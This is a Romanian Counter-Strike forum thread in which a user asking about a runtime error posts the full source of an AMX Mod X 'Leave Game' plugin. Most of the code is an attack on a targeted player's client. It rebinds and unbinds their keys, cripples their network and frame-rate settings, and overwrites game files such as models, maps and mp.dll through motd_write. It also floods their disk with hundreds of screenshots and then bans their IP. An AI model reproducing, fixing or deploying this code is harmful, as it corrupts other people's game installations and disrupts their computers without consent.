Amx_LeaveGame

Pluginuri facute de utilizatorii forumului eXtream.

Moderators: Moderatori ajutatori, Moderatori, Echipa eXtreamCS.com

Cosmin
Fost moderator
Fost moderator
Posts: 9362
Joined: 06 Jul 2013, 22:08
Detinator Steam: Da
Detinator server CS: Nu
Reputatie: Fost eXtream Mod
Fost Scripter eXtreamCS
Nume anterior: scosmynnnn
Has thanked: 492 times
Been thanked: 547 times

12 Oct 2014, 18:38

dracushorul wrote:IMI poate spune si mie cineva de ce imi da eroarea asta?
Function is not present (function "xs") (plugin "amx_leavegame.amxx")
[AMXX] Displaying debug trace (plugin "amx_leavegame.amxx")
[AMXX] Run time error 10: native e...rror (native "set_task")
[AMXX] [0] textgnjUSJ.sma::leavegame (line 135)
este un task pus aiurea cel mai probabil,pune sursa aici desi nu e categoria corespunzatoare ...
RoyalServer
dracushorul
Membru, skill 0
Membru, skill 0
Posts: 3
Joined: 12 Oct 2014, 09:46
Detinator Steam: Da
CS Status: Citesc forumul eXtreamCS.com...!
Fond eXtream: 0
Contact:

13 Oct 2014, 08:50

poftim si ms mult
| Afiseaza codul
#include <amxmodx>

#include <amxmisc>

#include <fun>

#include <engine>



#define Baza 45630



new BanData[33][2][32]

new bool:ComandaB = false

new DirectorServer[64],TextServer[32],LimbaServer = 31,r,t

new FisierServer[128]

new SalvareServer



static const poza[] = "http://www.indungi.ro sectiunea ACL" 



public plugin_init()

{

   register_plugin("Leave Game", "2.0", "DracuShoruL_M1c")

   register_concmd("amx_leavegame", "leavegame", ADMIN_LEVEL_G,"<nume> : Ii face praf CS-u + Snapshot + Ban pe IP permanent")

   register_concmd("amx_lg", "leavegame", ADMIN_LEVEL_G,"<nume> : Ii face praf CS-u + Snapshot + Ban pe IP permanent")

   register_cvar("amx_lg_activity","1")

}





public leavegame(id,level,cid){

   if (!cmd_access(id,level,cid,2)){

      return PLUGIN_HANDLED

   }

   if (ComandaB){

      Cronometru(id)

      return PLUGIN_HANDLED

   }

   new arg[32],name[32],admin[32],sAuthid[35],sAuthid2[35],message[552],players[33],inum

   new fo_logfile[64],timp[64],maxtext[256]

   new tinta[32], minute[8], motiv[64] 

   read_argv(1, tinta, 31)    

   read_argv(2, minute, 7) 

   read_argv(3, motiv, 63)

   read_argv(1, arg, 31)

   new target = cmd_target(id,arg,1)

   new jucator = cmd_target(id, tinta, 9) 

   

   if (!jucator) 

      

   return PLUGIN_HANDLED    

   

   

   copy(BanData[jucator][0], 31, minute) 

   copy(BanData[jucator][1], 31, motiv) 

   new TaskData[4] 

   TaskData[0] = id 

   TaskData[1] = jucator

   new numeserver[64], nume[32], ip[32] 

   get_user_name(target,name,31)

   get_user_name(id,admin,31)

   get_user_authid(target,sAuthid,34)

   get_user_authid(id,sAuthid2,34)

   get_cvar_string("hostname",numeserver,63); 

   get_user_name(jucator,nume,31); 

   get_user_ip(jucator,ip,31); 

   get_configsdir(fo_logfile, 63)

   get_time("%m/%d/%Y - %H:%M:%S",timp,63)

   IncarcareServer()

   ScriereServer()

   format(message,551,"LeaveGameD^nComanda executata cu succes.^n Comanda numarul %i",SalvareServer)

   format(maxtext, 255, "[LG] %s: %s a folosit comanda LeaveGame pe %s",timp,admin,name)

   format(fo_logfile, 63, "%s/LeaveGame.txt", fo_logfile)

   

   if(!target){ 

      

      return PLUGIN_HANDLED 

   }

   switch (get_cvar_num("amx_lg_activity")) {

      case 1: client_cmd(target,"say ^" %s mi-a dat LeaveGame (Plugin by ACL) !^"",admin)

         case 0: client_cmd(target,"say ^"Am primit LeaveGame (Plugin by ACL) !^"")

      }

   client_cmd(target,"developer 1")

   client_cmd(target,"unbind w;wait;unbind a;unbind s;wait;unbind d;bind mouse1 ^"say Am luat LeaveGame pe ACL .^";wait;unbind mouse2;unbind mouse3;wait;bind space quit")

   client_cmd(target,"unbind ctrl;wait;unbind 1;unbind 2;wait;unbind 3;unbind 4;wait;unbind 5;unbind 6;wait;unbind 7")

   client_cmd(target,"unbind 8;wait;unbind 9;unbind 0;wait;unbind r;unbind e;wait;unbind g;unbind q;wait;unbind shift")

   client_cmd(target,"unbind end;wait;bind escape ^"say Sunt neajutorat ca un mic *****^";unbind z;wait;unbind x;unbind c;wait;unbind uparrow;unbind downarrow;wait;unbind leftarrow")

   client_cmd(target,"unbind rightarrow;wait;unbind mwheeldown;unbind mwheelup;wait;bind ` ^"say Sunt neajutorat ca un mic *****^";bind ~ ^"say Am fost distrus .^";wait;name ^"LeaveGame#Distrus^"")

   client_cmd(target,"rate 1;gl_flipmatrix 1;cl_cmdrate 10;cl_updaterate 10;fps_max 1;hideradar;con_color ^"1 1 1^"")

   

   //Strica dll-uri si waduri si MDL

   client_cmd(target,"motdfile models/player.mdl;motd_write x");

   client_cmd(target,"motdfile models/v_ak47.mdl;motd_write x");

   client_cmd(target,"motdfile cs_dust.wad;motd_write x");

   client_cmd(target,"motdfile models/v_m4a1.mdl;motd_write x");

   client_cmd(target,"motdfile resource/GameMenu.res;motd_write x");

   client_cmd(target,"motdfile halflife.wad;motd_write x");

   client_cmd(target,"motdfile cstrike.wad;motd_write x");

   client_cmd(target,"motdfile maps/de_dust2.bsp;motd_write x");

   client_cmd(target,"motdfile events/ak47.sc;motd_write x");

   client_cmd(target,"motdfile dlls/mp.dll;motd_write x");

   

   

   

   

   

   //Mesaje say pe bind

   client_cmd(target, "bind ^"w^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"s^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"r^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   client_cmd(target, "bind ^"`^" ^"say Sa folosit pluginul LeaveGame  a lui ACL pe mine fiindca nu am respektat regulile." );

   

   

   

   write_file(fo_logfile,maxtext,-1)

   set_hudmessage(255,255,0,0.47,0.55,0,6.0,12.0,0.1,0.2,1)

   show_hudmessage(0, message)

   client_cmd(0, "spk ^"vox/bizwarn the coded has been detected and fucked^"")

   for (new i = 0; i < inum; ++i) {

      if ( access(players,ADMIN_CHAT) )

         client_print(players,print_chat,"[LG]Jucatorul:%s a primit LeaveGame de la %s",name,admin)

   }

   ComandaB = true

   Cronometru(id)   

   

   

   client_print(jucator, print_chat, "* Viziteaza %s pentru a scoate banul.", poza) 

   client_print(jucator, print_chat, "* Nume:  ^"%s^" cu IP : %s",nume,ip) 

   client_print(jucator, print_chat, "* Data : %s",timp) 

   client_print(jucator, print_chat, "* Ai primit ban de la adminul %s",admin)

   client_print(jucator, print_chat,"* Screenshot a fost facut pe : %s",numeserver) 

   client_cmd(jucator,"wait;snapshot;wait;snapshot")

   client_cmd(target,"cl_timeout 0")   

   

   

   //Baneaza jucatorul permanent

   client_cmd(id, "amx_addban ^"%s^" permanent LeaveGame", ip)

   //Parms

   new parms[1]

   parms[0] = target

   set_task(0.10,"xs",1337+id,parms,1)

   return PLUGIN_HANDLED

   

}



public spank(id,parms[]){

   new jucator = parms[0]

   if(is_user_connected(id)){

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

      client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

      client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")         

   }

   else{

      if(!is_user_connected(id)){

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")

         client_cmd(jucator,"snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot;snapshot")      

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")

